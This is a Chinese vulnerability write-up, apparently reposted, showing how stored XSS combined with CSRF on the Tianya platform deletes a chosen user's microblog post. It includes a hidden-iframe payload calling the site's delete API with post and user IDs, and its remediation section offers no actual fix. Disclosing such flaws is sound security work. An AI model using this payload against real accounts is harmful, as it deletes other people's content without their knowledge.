好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

天涯CSRF系列三: 结合储存型XSS定向删除指定用户

这次我们来看看如何利用XSS结合CSRF打造定向攻击

 再来看一下上次(http://HdhCmsTest2cto测试数据/Article/201310/248998.html)的文件引发的又一个问题 

 首先抓包拿到删除微博的URL

 

 

 

 

 

params.id 代表微博的ID

 

params.delUserId 代表所属帐号的ID

 

 

 

首先拿我自己做测试,我先发表一条微博

然后找到该条微博的ID

 

找到用户的ID

来到发送消息的页面

 

构造如下恶意代码:

<iframe style='display:none' src='http://HdhCmsTesttianya.cn/api/tw?method=tweet.ice.deleteTweet&params.id=68541413&params.delUserId=82776194' >

 

发送之后,我们查看 源码

 

这时 CSRF+XSS 已经攻击成功,回到首页查看,微博已没。

 

 

修复方案: 幸苦你们了

 

查看更多关于天涯CSRF系列三: 结合储存型XSS定向删除指定用户的详细内容...

  阅读:51次